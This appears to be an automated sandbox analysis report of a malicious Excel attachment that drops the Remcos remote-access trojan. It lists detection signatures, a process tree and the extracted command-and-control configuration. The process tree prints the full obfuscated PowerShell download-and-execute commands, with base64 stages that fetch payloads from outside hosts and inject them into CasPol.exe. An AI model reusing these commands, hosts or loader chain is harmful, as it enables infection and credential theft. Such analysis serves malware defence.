Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0200011080.xls

Overview

General Information

Sample name:0200011080.xls
Analysis ID:1567364
MD5:bd6ddad63fc3c23331d2a7fd5ee23c06
SHA1:49faa91ee8dd7d5e4484291afa6e1e5bbd0c5b08
SHA256:6442a471211f88890f7d98021a2b478a872e1f5e6053a1f52fbd65da97755fbb
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3588 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3696 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3720 cmdline: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3936 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 1200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 2392 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3132 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • mshta.exe (PID: 4084 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1908 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2668 cmdline: POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1076 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 2116 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 2112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["lonan.duckdns.org:4044:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Z4DJFI", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingpersonwithhergirlfriendsheisbeautiful[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6b6f8:$a1: Remcos restarted by watchdog!
            • 0x6bc70:$a3: %02i:%02i:%02i:%03i
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              32.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                32.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  32.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6b6f8:$a1: Remcos restarted by watchdog!
                  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                  32.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x65a04:$str_b2: Executing file:
                  • 0x6683c:$str_b3: GetDirectListeningPort
                  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x66380:$str_b7: \update.vbs
                  • 0x65a2c:$str_b9: Downloaded file:
                  • 0x65a18:$str_b10: Downloading file:
                  • 0x65abc:$str_b12: Failed to upload file:
                  • 0x66804:$str_b13: StartForward
                  • 0x66824:$str_b14: StopForward
                  • 0x662d8:$str_b15: fso.DeleteFile "
                  • 0x6626c:$str_b16: On Error Resume Next
                  • 0x66308:$str_b17: fso.DeleteFolder "
